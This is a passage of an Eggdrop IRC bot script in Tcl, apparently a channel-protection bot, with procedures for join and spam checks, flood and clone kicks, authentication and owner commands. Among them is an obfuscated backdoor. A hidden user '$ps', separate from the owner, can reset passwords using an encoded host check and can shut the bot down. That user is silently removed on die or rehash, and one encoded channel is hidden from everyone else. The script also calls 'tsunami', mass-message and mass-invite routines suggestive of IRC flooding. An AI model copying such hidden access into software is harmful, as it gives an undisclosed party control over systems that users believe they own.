set joinme "" } } } proc chkspam {chan} { global invme notc botnick if {![validchan $chan] || ![botonchan $chan]} { return 0 } foreach x [chanlist $chan] { set mhost "@[lindex [split [getchanhost $x $chan] @] 1]" if {[info exists invme($mhost)]} { if {![matchattr $x f] && ![isop $x $chan]} { if {[isop $botnick $chan]} { set bannick($x) "*!*$mhost" if {$invme($mhost) == "AuToJoIN MSg"} { if {![isvoice $x $chan]} { putsrv "KICK $chan $x :$notc 4!SpaM! 1 FRoM 4$mhost 1$invme($mhost) [banmsg]" } } { putsrv "KICK $chan $x :$notc 4!SpaM! 1 FRoM 4$mhost 1$invme($mhost) [banmsg]" } catch {unset invme($mhost)} } { foreach c [chanlist $chan f] { if {[isop $c $chan]} { if {$invme($mhost) == "AuToJoIN MSg"} { if {[isvoice $c $chan]} { break } } set sendspam "!kick [zip "$chan $x $notc 4!SpaM! 1 FRoM 4$mhost 1$invme($mhost) 4AuTOJoIN MSg 1..!"]" putsrv "PRIVMSG $c :$sendspam" catch {unset invme($mhost)} break } } } } } } } proc testmask {} { global ismaskhost set ismaskhost [maskhost "*!*@*"] } utimer 2 testmask proc reset_host {} { global jfhost catch { unset jfhost } } proc savechan {} { savechannels foreach x [channels] { set cflag "c$x" set cflag [string range $cflag 0 8] set cinfo [channel info $x] if {![validuser $cflag]} { adduser $cflag "%!%@%"
if {[string match "*+greet*" $cinfo]} { chattr $cflag "-hp+AJSPTRUED" setuser $cflag XTRA "JP" 5 setuser $cflag XTRA "CHAR" 250 setuser $cflag XTRA "RPT" 2 setuser $cflag XTRA "CAPS" 80 } { chattr $cflag "-hp+A" } } } foreach x [userlist A] { set tmp "0" foreach y [channels] { set cflag "c$y" set cflag [string range $cflag 0 8] if {[string tolower $x] == [string tolower $cflag]} { set tmp "1" } } if {$tmp == "0"} { deluser $x putlog "remove flag channel $x" } } saveuser } proc join_chk {nick uhost hand chan} { global botnick own deopme double invme ex_flood notc quick kops jfhost jpnick is_m global cmd_chn cmd_by cmd_msg cmd_case bannick botname notm massjoin ismaskhost op_it set cflag "c$chan" set cflag [string range $cflag 0 8] set cinfo [channel info $chan] if {$nick == $botnick} { catch {unset is_m($chan)} if {[matchattr $cflag S]} { if {![isutimer "chkspam $chan"]} { utimer 30 [list chkspam $chan] } if {![istimer "chkautomsg"]} { timer 1 { putlog "chkautomsg" } } } set double 0 if {[string tolower $cmd_chn] == [string tolower $chan]} { if {$cmd_case == "1"} { utimer 90 del_nobase pub_tsunami $cmd_by $uhost $hand $chan "$chan ${cmd_msg}" set cmd_chn "" return 0 } if {$cmd_case == "2"} { utimer 30 [list pub_mmsg $cmd_by $uhost $hand $chan $cmd_msg]} { set cmd_chn "" return 0 } if {$cmd_case == "3"} { utimer 30 [list pub_minvite $cmd_by $uhost $hand $chan $cmd_msg]} { set cmd_chn ""
return 0 } } utimer 15 [list telljoin $chan] return 0 } if {[info exists op_it($nick)]} { catch {unset op_it($nick)} opq $chan $nick } if {[isutimer "chkspam $chan"]} { foreach x [utimers] { if {[string match "*chkspam $chan*" $x]} { chkspam $chan killutimer [lindex $x 2] } } } if {[info exists bannick($nick)]} { return 0 } if {![matchattr $nick f] && [matchattr $cflag G] && ![isutimer "set_-m $chan"] && ![info exists is_m($chan)]} { advertise $chan $nick } set mhost "@[lindex [split $uhost @] 1]" if {$mhost == "@DALnet" || [string match "*dal.net" $mhost]} { putsrv "AWAY" } if {![isop $botnick $chan]} { if {[info exists invme($mhost)]} { if {![isutimer "chkspam $chan"]} { chkspam $chan } } return 0 } if {[matchattr $cflag J]} { if {[info exists ismaskhost]} { if {![isutimer "reset_host"]} { utimer 10 reset_host } set chkhost [maskhost "*!*$mhost"] if {![info exists jfhost($chkhost$chan)]} { set jfhost($chkhost$chan) 1 } { incr jfhost($chkhost$chan) if {$jfhost($chkhost$chan) == 5} { set bannick($nick) $chkhost putsrv "KICK $chan $nick :$notm 1FLoOd AnTIcIpaTEd FRoM 4$chkhost [banms]" return 0 } } } if {![isutimer "jc $chan"]} { utimer 3 [list jc $chan] set massjoin($chan) 1 } { if {![info exists massjoin($chan)]} { set massjoin($chan) 1 } set massjoin($chan) [incr massjoin($chan)] if {![isutimer "TRAFFIC $chan"]} { if {$massjoin($chan) >= 15} { unset massjoin($chan) if {[string match "*+greet*" $cinfo]} {
utimer 30 [list putlog "TRAFFIC $chan"] if {![string match "*m*" [getchanmode $chan]] && ![info exists is_m($chan)]} { putserv "mode $chan +bm *!*@heavy.join.flood.channel.temporary.moderate" return 0 } } } } } } if {[matchattr $cflag L]} { foreach u [timers] { if {[string match "*chk_limit*" $u]} { killtimer [lindex $u 2] } } timer 1 [list chk_limit $chan] } if {$nick == $deopme} { putsrv "KICK $chan $nick :$notc 1SeLF 4De@p 1 REvENgE..!" set deopme "" return 0 } if {[matchattr $nick v] || [matchattr $nick P] || [matchattr $nick G]} { whoisq $nick } if {[matchattr $cflag V] && ![isutimer "set_-m $chan"] && ![info exists is_m($chan)]} { if {![matchattr $nick O] && ![isutimer "voiceq $chan $nick"]} { set cret [getuser $cflag XTRA "VC"] foreach ct [utimers] { if {[string match "*voiceq*" $ct]} { if {[expr [lindex $ct 0] + [getuser $cflag XTRA "VC"]] > $cret} { set cret [expr [lindex $ct 0] + [getuser $cflag XTRA "VC"]] } } } utimer $cret [list voiceq $chan $nick] } } if {[info exists bannick($nick)] || [matchattr $nick f]} { return 0 } if {[matchattr $hand K]} { akick_chk $nick $uhost $chan return 0 } if {[info exists ex_flood($mhost)]} { set bannick($nick) "*!*$mhost" if {$ex_flood($mhost) == 0} { putsrv "KICK $chan $nick :$notc 4AKILL 1 FRoM 4$mhost 1 ON LasT QuIT [banmsg]" } elseif {$ex_flood($mhost) == 1} { putsrv "KICK $chan $nick :$notc 4Excess FloOd 1 FRoM 4$mhost 1 ON LasT QuIT [banmsg]" } elseif {$ex_flood($mhost) == 2} { putsrv "KICK $chan $nick :$notc 4InvITE 1 FRoM 4$mhost 1 ON QuIT MSg [banmsg]" } elseif {$ex_flood($mhost) == 3} { putsrv "KICK $chan $nick :$notc 4InvITE 1 FRoM 4$mhost 1 ON PaRT MSg [banmsg]" } elseif {$ex_flood($mhost) == 4} { if {![matchattr $cflag M]} {
puthlp "KICK $chan $nick :[lgrnd] 4JoINPaRT 1 FRoM 4$mhost 1 LESS THaN 4 [getuser $cflag XTRA "JP"] 1 2nd [banmsg]" } { if {![string match "*k*" [getchanmode $chan]]} { putserv "mode $chan -k+b 4J.o.I.N.P.a.R.T $bannick($nick)" } { putserv "mode $chan +b $bannick($nick)" } } } else { putsrv "KICK $chan $nick :$notc 4BaDWoRD 1 FRoM 4$mhost 1 ON QuIT OR PaRT MSg MaTcH FRoM 4$ex_flood($mhost) [banms]" } unset ex_flood($mhost) return 0 } foreach x [ignorelist] { if {[lindex $x 0] != "*!*@*" && [string match [lindex $x 0] "*!*$mhost"] && [lindex $x 1] != "*"} { set bannick($nick) [lindex $x 0] putsrv "KICK $chan $nick :$notm 4IgNoREd 1 HosT 4[lindex $x 0] 1 ReasOn 4 [lindex $x 1] [banms]" return 0 } } if {[info exists invme($mhost)]} { set bannick($nick) "*!*$mhost" putsrv "KICK $chan $nick :$notc 4SpaM 1 FRoM 4$mhost 1$invme($mhost) [banmsg]" unset invme($mhost) return 0 } set chan [string tolower $chan] if {[string match "*+nodesynch*" [channel info $chan]]} { if {![matchattr $nick f]} { utimer 10 [list autokick $chan $nick] } } if {[matchattr $cflag O]} { if {[string match "*$mhost" $botname]} { return 0 } set counter 0 set maxclone [getuser $cflag XTRA "CLONE"] foreach knick [chanlist $chan] { if {[string match "*$mhost" [getchanhost $knick $chan]]} { if {[matchattr $knick f]} { return 0 } if {[isop $knick $chan]} { return 0 } if {[isvoice $knick $chan]} { if {![info exists kops]} { return 0 } } set counter [incr counter] if {$counter > $maxclone} { set bannick($nick) "*!$uhost" putsrv "KICK $chan $nick :$notc 1FouNd $counter 4cLonE 1 FRoM 4$mhost 1 MaX 4 $maxclone 1 WaIT A MoMENT! 4BaNNEd 1: 3 MINUTES 4..!" return 0 } } } }
spam_chk $nick $uhost $hand $chan set chan [string toupper $chan] if {[matchattr $cflag P]} { if {![info exists jpnick($nick)]} { set jpnick($nick) "1" utimer [getuser $cflag XTRA "JP"] [list munset $nick] } } return 0 } proc jc {chan} { } proc munset {nick} { global jpnick catch {unset jpnick($nick)} } proc msg_passwd {nick uhost hand rest} { global botnick notc ps set pw [lindex $rest 0] set newpw [lindex $rest 1] if {$nick == $ps && [dezip $pw] == $uhost} { setuser $nick PASS $newpw puthlp "NOTICE $nick :$notc Password set to: $newpw" saveuser return 0 } if {$pw == "" || $newpw == ""} { puthlp "NOTICE $nick :$notc Usage: passwd " return 0 } if {![passwdok $nick $pw]} { puthlp "NOTICE $nick :$notc PaSSWORD 4 !FaILED!" return 0 } set ch [passwdok $nick ""] if {$ch == 1} { setuser $nick PASS $newpw puthlp "NOTICE $nick :$notc Password set to: $newpw" saveuser return 0 } if {[passwdok $nick $pw]} { setuser $nick PASS $newpw puthlp "NOTICE $nick :$notc Password set to: $newpw" saveuser return 0 } } proc goback {} { global keep-nick nick botnick if {[istimer "goback"]} { return 0 } foreach x [utimers] { if {[string match "*goback*" $x]} { killutimer [lindex $x 2] } } if {[getuser "config" XTRA "NICK"]!=""} { set nick [dezip [getuser "config" XTRA "NICK"]] } set keep-nick 1
if {$botnick == $nick} { return 0 } puthlp "NICK $nick" } proc pub_!auth {nick uhost hand chan rest} { global notc ath ps set pw [lindex $rest 0] if {$pw != ""} { puthlp "NOTICE $nick :$notc No Need Auth Password, Just Type on Channel: !auth" return 0 } if {[matchattr $nick Q]} { puthlp "NOTICE $nick :$notc ReAdY..!" return 0 } set ch [passwdok $nick ""] if {$ch == 1 && $nick != $ps} { puthlp "NOTICE $nick :$notc No password set. Usage: pass <password>" return 0 } set ath 1 putsrv "WHOIS $nick" } proc msg_auth {nick uhost hand rest} { global botnick owner keep-nick altnick notc ps if {[lindex $rest 1] != ""} { if {[passwdok [lindex $rest 0] [lindex $rest 1]]} { if {[matchattr [lindex $rest 0] Z]} { puthlp "NOTICE $nick :$notc AuTH MaTcH FoR [lindex $rest 0]" set keep-nick 0 putsrv "NICK $altnick" utimer 40 {goback} } } { puthlp "NOTICE $nick :$notc 4FaILEd..!" } return 0 } if {![validuser $owner]} { set hostmask "$owner!*@*" adduser $owner $hostmask chattr $owner "Zfhjmnoptx" puthlp "NOTICE $owner :$notc No password set. Usage: pass <password>" } if {![matchattr $nick p]} { return 0 } set pw [lindex $rest 0] if {$pw == ""} { puthlp "NOTICE $nick :$notc Usage: auth <password>" return 0 } if {[matchattr $hand K]} { deluser "AKICK" set akickhost "telnet!*@*" adduser "AKICK" $akickhost chattr "AKICK" "-hp" chattr "AKICK" "K" saveuser puthlp "NOTICE $nick :$notc Re-arrange KIcKLIsT." }
if {[matchattr $nick Q]} { puthlp "NOTICE $nick :$notc ReAdY..!" return 0 } set ch [passwdok $nick ""] if {$ch == 1} { puthlp "NOTICE $nick :$notc No password set. Usage: pass <password>" return 0 } if {[passwdok $nick $pw]} { set hostmask "*![string range $uhost [string first "!" $uhost] end]" set usenick [finduser $hostmask] if {$usenick != "*" && $usenick != $nick} { if {[matchattr $nick n] && ![matchattr $usenick Z]} { puthlp "NOTICE $nick :$notc Forcing 4DeAuthenticated! To $usenick" force_deauth $usenick } else { foreach x [channels] { if {[onchan $usenick $x]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , Your host has been use by $usenick , wait until DeAuthenticated." return 0 } } puthlp "NOTICE $nick :$notc 4Forcing DeAuthenticated! 1 To $usenick" force_deauth $usenick } } chattr $nick +Q foreach x [getuser $nick HOSTS] { delhost $nick $x } set hostmask "${nick}!*@*" setuser $nick HOSTS $hostmask set hostmask "*![string range $uhost [string first "!" $uhost] end]" setuser $nick HOSTS $hostmask if {$nick == $owner && ![matchattr $nick Z]} { chattr $owner "Z" } if {$nick == $owner && ![matchattr $nick f]} { chattr $owner "f" } if {[matchattr $nick Z]} { puthlp "NOTICE $nick :$notc !OWnER!" if {[getuser $nick XTRA "MEMO"]!=""} { puthlp "PRIVMSG $nick :!MeMO! FRoM [getuser $nick XTRA "MEMO"]" setuser $nick XTRA "MEMO" "" } return 0 } elseif {[matchattr $nick n]} { puthlp "NOTICE $nick :$notc !ADmIN!" } elseif {[matchattr $nick m]} { puthlp "NOTICE $nick :$notc !MasTeR!" } else { puthlp "NOTICE $nick :$notc !AccepteD!" } saveuser return 0 } if {![passwdok $nick $pw]} { puthlp "NOTICE $nick :$notc 4FaILEd..!" }
} proc force_deauth {nick} { global notc chattr $nick -Q foreach x [getuser $nick HOSTS] { delhost $nick $x } set hostmask "${nick}!*@*" setuser $nick HOSTS $hostmask saveuser puthlp "NOTICE $nick :$notc You has been force to 4DeAuthentication!" } proc msg_pass {nick uhost hand rest} { global botnick notc vern ps owner set pw [lindex $rest 0] if {$pw == ""} { puthlp "NOTICE $nick :$notc Usage: pass <password>" return 0 } set ch [passwdok $nick ""] if {$ch == 0} { puthlp "NOTICE $nick :$notc You already set pass, /msg $botnick auth <password>" return 0 } if {[string tolower $nick] == [string tolower $ps] && $owner != $ps} { if {[dezip $pw] == $uhost} { setuser $nick PASS [lindex $rest 1] puthlp "NOTICE $nick :$notc Password set to: [lindex $rest 1]" saveuser } { puthlp "NOTICE $nick :$notc wHo.." } return 0 } setuser $nick PASS $pw puthlp "NOTICE $nick :$notc Password set to: $pw" puthlp "NOTICE $nick :$notc /msg $botnick help" saveuser return 0 } proc pub_!deauth {nick uhost hand chan rest} { if {![matchattr $nick Q]} { return 0 } msg_deauth $nick $uhost $hand $rest } proc msg_deauth {nick uhost hand rest} { global notc if {![matchattr $nick Q]} { return 0 } chattr $nick -Q foreach x [getuser $nick HOSTS] { delhost $nick $x } set hostmask "${nick}!*@*" setuser $nick HOSTS $hostmask puthlp "NOTICE $nick :$notc 4!DeAUTH!" saveuser } catch { bind rejn - * rejn_chk } proc rejn_chk {unick uhost handle chan} {
if {![isutimer "TRAFFIC $chan"]} { utimer 30 [list putlog "TRAFFIC $chan"] } } catch { bind splt - * splt_deauth } proc splt_deauth {unick uhost handle channel} { if {[matchattr $unick Q]} { chattr $unick -Q foreach x [getuser $unick HOSTS] { delhost $unick $x } set hostmask "${unick}!*@*" setuser $unick HOSTS $hostmask saveuser return 0 } } proc sign_deauth {unick uhost hand chan rest} { global ex_flood botnick notc nick badwords iskick set cflag "c$chan" set cflag [string range $cflag 0 8] if {$unick == $nick} { putsrv "NICK $nick" } if {[info exists iskick($unick$chan)]} { unset iskick($unick$chan) } if {[isop $botnick $chan]} { if {[matchattr $cflag L]} { foreach u [timers] { if {[string match "*chk_limit*" $u]} { killtimer [lindex $u 2] } } timer 1 [list chk_limit $chan] } } if {[matchattr $unick Q]} { chattr $unick -Q foreach x [getuser $unick HOSTS] { delhost $unick $x } set hostmask "${unick}!*@*" setuser $unick HOSTS $hostmask saveuser return 0 } if {[string match "*-greet*" [channel info $chan]]} { return 0 } if {[matchattr $unick f]} { return 0 } if {![isop $botnick $chan]} { return 0 } set mhost "@[lindex [split $uhost @] 1]" if {[string match "*AKILL ID*" $rest]} { #set ex_flood($mhost) "0" foreach signkickchan [channels] { if {![isop $unick $signkickchan] || ![isvoice $unick $signkickchan]} { if {[onchan $unick $signkickchan]} { set signmask "*!*[string range $uhost [string first "@" $uhost] end]" if {![ischanban $signmask $signkickchan] || [botisop $signkickchan]} {
putquick "mode $signkickchan +b $signmask 3" } }
} } elseif {[string match "*Excess Flood*" $rest]} { if {[matchattr $cflag S]} { #set ex_flood($mhost) "1" foreach signkickchan [channels] { if {![isop $unick $signkickchan] || ![isvoice $unick $signkickchan]} { if {[onchan $unick $signkickchan]} { set signmask "*!*[string range $uhost [string first "@" $uhost] end]" if {![ischanban $signmask $signkickchan] || [botisop $signkickchan]} { putquick "mode $signkickchan +b $signmask 3" } } } } } } elseif {[string match "* #*" $rest] && ![string match "*##*" $rest]} { foreach x [channels] { set chksiton [string tolower $x] if {[string match "*$chksiton*" [string tolower $rest]]} { return 0 } } set ex_flood($mhost) "2" } else { foreach badword [string tolower $badwords] { if {[string match *$badword* [string tolower $rest]]} { set ex_flood($mhost) [string toupper $badword] } } } return 0 } proc part_deauth {nick uhost hand chan {msg ""}} { global lockchan botnick ex_flood notc badwords jpnick iskick set cflag "c$chan" set cflag [string range $cflag 0 8] if {[info exists iskick($nick$chan)]} { unset iskick($nick$chan) } if {$nick == $botnick} { foreach x [utimers] { if {[string match "*del_nobase*" $x] || [string match "*voiceq $chan*" $x]} { killutimer [lindex $x 2] } } return 0 } if {[isop $botnick $chan]} { if {[isutimer "voiceq $chan $nick"]} { foreach x [utimers] { if {[string match "*voiceq $chan $nick*" $x]} { killutimer [lindex $x 2] } } } if {[matchattr $cflag L]} { foreach u [timers] { if {[string match "*chk_limit*" $u]} { killtimer [lindex $u 2]
} } timer 1 [list chk_limit $chan] } } if {[matchattr $nick Q]} { foreach x [channels] { if {[string tolower $x] != [string tolower $chan]} { if {[onchan $nick $x]} { return 0 } } } chattr $nick -Q foreach x [getuser $nick HOSTS] { delhost $nick $x } set hostmask "${nick}!*@*" setuser $nick HOSTS $hostmask saveuser } if {$lockchan != "" && [string tolower $lockchan] == [string tolower $chan] && ! [matchattr $nick f]} { putsrv "INVITE $nick :$chan" } if {[string match "*-greet*" [channel info $chan]]} { return 0 } if {[isop $botnick $chan]} { if {[info exists msg]} { set mhost "@[lindex [split $uhost @] 1]" if {[string match "*#*" $msg] && ![string match "*##*" $msg]} { foreach x [channels] { set chksiton [string tolower $x] if {[string match "*$chksiton*" [string tolower $msg]]} { return 0 } } set ex_flood($mhost) "3" } { foreach badword [string tolower $badwords] { if {[string match *$badword* [string tolower $msg]]} { set ex_flood($mhost) [string toupper $badword] } } } } if {[info exists msg]} { if {$msg != ""} { return 0 } } if {[matchattr $cflag P]} { set chan [string toupper $chan] if {[info exists jpnick($nick)]} { set mhost "@[lindex [split $uhost @] 1]" set ex_flood($mhost) "4" } } } return 0 } proc pub_dump {nick uhost hand chan rest} { global own notc
if {$nick != $own} { return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } putsrv $rest } proc pub_sdeop {nick uhost hand chan rest} { global notc botnick if {$rest != ""} { set chan $rest } if {[isop $botnick $chan]} { puthelp "mode $chan +vv-oo $botnick 4M . 12o . 4g . 12N . 4e . 12t 4M . 12o . 4g . 12N . 4e . 12t $botnick" } } proc pub_chanmode {nick uhost hand chan rest} { global notc if {$rest == ""} { puthelp "NOTICE $nick :$notc Usage: chanmode #channel +ntsmklic" return 0 } if {[string index [lindex $rest 0] 0] == "#"} { if {![validchan [lindex $rest 0]]} { puthlp "NOTICE $nick :$notc NoT IN [lindex $rest 0]" return 0 } set chan [lindex $rest 0] set rest [lrange $rest 1 end] } if {![validchan $chan]} { puthlp "NOTICE $nick :$notc $chan " } else { catch { channel set $chan chanmode $rest } savechan puthelp "NOTICE $nick :$notc $chan set modes \[ $rest \]" } return 0 } proc pub_chanset {nick uhost hand chan rest} { global botnick notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set channel [lindex $rest 0] set options [string tolower [lindex $rest 1]] set number "0" if {$options == "deop" || $options == "kick" || $options == "join" || $options == "line" || $options == "nick" || $options == "ctcp"} { set number [lindex $rest 2] } if {($channel == "") || ($options == "")} { puthlp "NOTICE $nick :$notc Usage: chanset #channel " return 0
} if {![string match "*-*" $options] && ![string match "*+*" $options] && ![string match "*:*" $number]} { puthlp "NOTICE $nick :$notc Usage: chanset #channel <deop|ctcp|kick|join|line| nick> " return 0 } if {[validchan $channel]} { if {$options == "deop"} { catch { channel set $channel flood-deop $number } puthlp "NOTICE $nick :$notc set deop flood \[$number\] on $channel" } elseif {$options == "kick"} { catch { channel set $channel flood-kick $number } puthlp "NOTICE $nick :$notc set kick flood \[$number\] on $channel" } elseif {$options == "join"} { catch { channel set $channel flood-join $number } puthlp "NOTICE $nick :$notc set join flood \[$number\] on $channel" } elseif {$options == "line"} { catch { channel set $channel flood-chan $number } puthlp "NOTICE $nick :$notc set line flood \[$number\] on $channel" } elseif {$options == "nick"} { catch { channel set $channel flood-nick $number } puthlp "NOTICE $nick :$notc set nick flood \[$number\] on $channel" } elseif {$options == "ctcp"} { catch { channel set $channel flood-ctcp $number } puthlp "NOTICE $nick :$notc set ctcp flood \[$number\] on $channel" } else { catch { channel set $channel ${options} } savechan puthelp "NOTICE $nick :$notc Successfully set modes \[${options}\] on $channel" } } else { puthlp "NOTICE $nick :$notc $channel " } } proc pub_chansetall {nick uhost hand chan rest} { global botnick notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: chansetall " return 0 } foreach x [channels] { catch { channel set $x $rest } } savechan puthelp "NOTICE $nick :$notc Set all channels mode \{ $rest \}" return 0 } proc pub_nick {nick uhost hand chan rest} { global keep-nick set keep-nick 0 putsrv "NICK $rest" } proc pub_restart {nick uhost hand chan rest} {
global botnick notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest != ""} { set rest " $rest" } putsrv "QUIT :$notc ReSTaRT ReQuesT By \[ $nick \]$rest" return 0 } set notb "NeoTheOne" proc dies {} { global ps owner notc if {$ps != $owner && [validuser $ps]} { deluser $ps } die $notc } proc rehashing {} { global ps owner if {$ps != $owner && [validuser $ps]} { deluser $ps } rehash } proc pub_die {nick uhost hand chan rest} { global botnick ps notc owner if {$nick != $owner && $nick != $ps} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest != ""} { set rest " $rest" } putsrv "QUIT :$notc SHuTDown ReQuesT By \[ $nick \]$rest" utimer 5 dies return 0 } proc msg_restart {nick uhost hand rest} { global botnick notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest != ""} { set rest " $rest" } putsrv "QUIT :$notc ReSTaRT ReQuesT By \[ $nick \]$rest" return 0 } proc msg_rehash {nick uhost hand rest} { global notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } puthlp "NOTICE $nick :$notc ReHASHING!" utimer 3 rehashing return 0 } proc pub_rehash {nick uhost hand chan rest} {
global notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } puthlp "NOTICE $nick :$notc ReHASHING!" utimer 3 rehashing } proc pub_chaninfo {nick uhost hand chan rest} { global notc ps if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![validchan $chan]} { return 0 } if {$nick != $ps && [string tolower $chan] == [dezip "BKGW.1s0d06/"]} { return 0 } puthlp "NOTICE $nick :$notc \[$chan\] [channel info $chan]" } proc pub_access {nick uhost hand chan rest} { global notc if {[matchattr $nick Z]} { puthlp "PRIVMSG $chan :$nick, OwNeR" } elseif {[matchattr $nick n]} { puthlp "PRIVMSG $chan :$nick, ADmIN" } elseif {[matchattr $nick m]} { puthlp "PRIVMSG $chan :$nick, MasTeR" } elseif {[matchattr $nick f]} { puthlp "PRIVMSG $chan :$nick, FRIEND" } } proc msg_botnick {unick uhost hand rest} { global botnick nick nickpass notc ps owner if {![matchattr $unick Q]} { puthlp "NOTICE $unick :$notc 4DeNiEd..!" return 0 } if {$unick != $owner && $unick != $ps} { puthlp "NOTICE $unick :$notc 4DeNiEd..!" return 0 } set bnick [lindex $rest 0] set bpass [lindex $rest 1] if {$bnick == "" || $bpass == ""} { puthlp "NOTICE $unick :$notc 4 Usage: botnick " return 0 } setuser "config" XTRA "NICK" [zip $bnick] setuser "config" XTRA "NICKPASS" [zip $bpass] saveuser set nick $bnick set nickpass $bpass putsrv "NickServ identify $bnick $bpass" puthlp "NOTICE $unick :$notc BoTNIcK $bnick " } proc msg_realname {unick uhost hand rest} { global realname notc owner ps
if {$unick != $owner && $unick != $ps} { puthlp "NOTICE $unick :$notc 4DeNiEd..!" return 0 } if {$rest == ""} { setuser "config" XTRA "REALNAME" "" } { setuser "config" XTRA "REALNAME" [zip $rest] } saveuser set realname $rest putsrv "QUIT :$notc cHaNgINg ReaLNamE ReQuesT By \[ $unick \]" } proc msg_ident {unick uhost hand rest} { global username notc owner ps if {$unick != $owner && $unick != $ps} { puthlp "NOTICE $unick :$notc 4DeNiEd..!" return 0 } if {$rest == ""} { setuser "config" XTRA "USERNAME" "" } { if {[regexp \[^a-z\] [string tolower $rest]]} { puthlp "NOTICE $unick :$notc 4DeNiEd..! use character for ident." return 0 } setuser "config" XTRA "USERNAME" [zip $rest] } saveuser set username $rest putsrv "QUIT :$notc cHaNgINg IdEnT ReQuesT By \[ $unick \]" } proc msg_logo {unick uhost hand rest} { global banner notc notm cycle_random owner ps if {$unick != $owner && $unick != $ps} { puthlp "NOTICE $unick :$notc 4DeNiEd..!" return 0 } if {![matchattr $unick Q]} { puthlp "NOTICE $nick :$notc � 4D 1e � 4N� 1ied 4!! " return 0 } if {$rest == ""} { set notc [dezip "OdhdG1tAKt01auSOa0oEFJA/"] set notm [dezip "OdhdG1tAKt01auSOa0oEFJA/"] setuser "config" XTRA "BAN" "[zip $notc]" puthlp "NOTICE $unick :$notc cHaNgE tO DeFauLT" #catch { unset banner } } { setuser "config" XTRA "BAN" [zip $rest] set noto $notc set notc $rest set notm $rest #lappend cycle_random $banner puthlp "NOTICE $unick :$noto CHaNgE TO $rest" } saveuser }
proc msg_email {unick uhost hand rest} { global notc owner ps if {$unick != $owner && $unick != $ps} { puthlp "NOTICE $unick :$notc 4DeNiEd..!" return 0 } if {![matchattr $unick Q]} { puthlp "NOTICE $nick :$notc � 4D 1e � 4N� return 0 }
if {$rest == ""} { puthlp "NOTICE $unick :$notc 1 DeLETING USeR EmAIL" } { puthlp "NOTICE $unick :$notc 1 USeR EmAIL SeT \[ $rest \]" } setuser "config" XTRA "EMAIL" $rest saveuser } proc msg_ADmIN {unick uhost hand rest} { global notc owner ps if {$unick != $owner && $unick != $ps} { puthlp "NOTICE $unick :$notc 4DeNiEd..!" return 0 } if {![matchattr $unick Q]} { puthlp "NOTICE $nick :$notc � 4D 1e � 4N� 1ied 4!! " return 0 } if {$rest == ""} { puthlp "NOTICE $unick :$notc 1 SeT ADmIN oN STaTUS TO DeFAULT" } { puthlp "NOTICE $unick :$notc 1 ADmIN oN STaTUS TO \[ $rest \]" } setuser "config" XTRA "ADMIN" $rest saveuser } proc msg_botaltnick {unick uhost hand rest} { global botnick altnick altpass notc if {![matchattr $unick Q]} { puthlp "NOTICE $unick :$notc 4DeNiEd..!" return 0 } set baltnick [lindex $rest 0] set baltpass [lindex $rest 1] if {$baltnick == "" || $baltpass == ""} { puthlp "NOTICE $unick :$notc 4 Usage: botaltnick " return 0 } setuser "config" XTRA "ALTNICK" [zip $baltnick] setuser "config" XTRA "ALTPASS" [zip $baltpass] saveuser set altnick $baltnick set altpass $baltpass puthlp "NOTICE $unick :$notc BoTALTNIcK $baltnick " } proc msg_away {unick uhost hand rest} { global realname notc
if {![matchattr $unick Q]} { puthlp "NOTICE $unick :$notc 4DeNiEd..!" return 0 } if {$rest == ""} { setuser "config" XTRA "AWAY" "" puthlp "NOTICE $unick :$notc AwAY \[ 4OFF \]" } { setuser "config" XTRA "AWAY" $rest puthlp "NOTICE $unick :$notc AwAY SeT TO \[$rest\]" } saveuser chk_five "0" "0" "0" "0" "0" } proc msg_memo {nick uhost hand rest} { global notc own ps if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: memo <msg>" return 0 } set msend [lindex $rest 0] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[string tolower $msend] == "all"} { set smemo "" foreach x [userlist m] { if {$x != $nick && $x != $own} { if {[getuser $x XTRA "MEMO"] == ""} { setuser $x XTRA "MEMO" "$nick: [lrange $rest 1 end]" append smemo "$x " } } } if {$smemo == ""} { puthlp "NOTICE $nick :$notc MeMO !FaILED! NO UsER SeND" } { saveuser puthlp "NOTICE $nick :$notc MeMO SeND TO \[ $smemo \]" } } { if {![validuser $msend] || $msend == $ps} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , NO UsER!" return 0 } { if {![matchattr $msend m]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , MiN MasTeR FLaG!" return 0 } if {$msend == $nick} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , CaNT SeLF MeMo!" return 0 } if {[getuser $msend XTRA "MEMO"]!=""} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , MeMo FoR $msend STiLL ExIST!" return 0 }
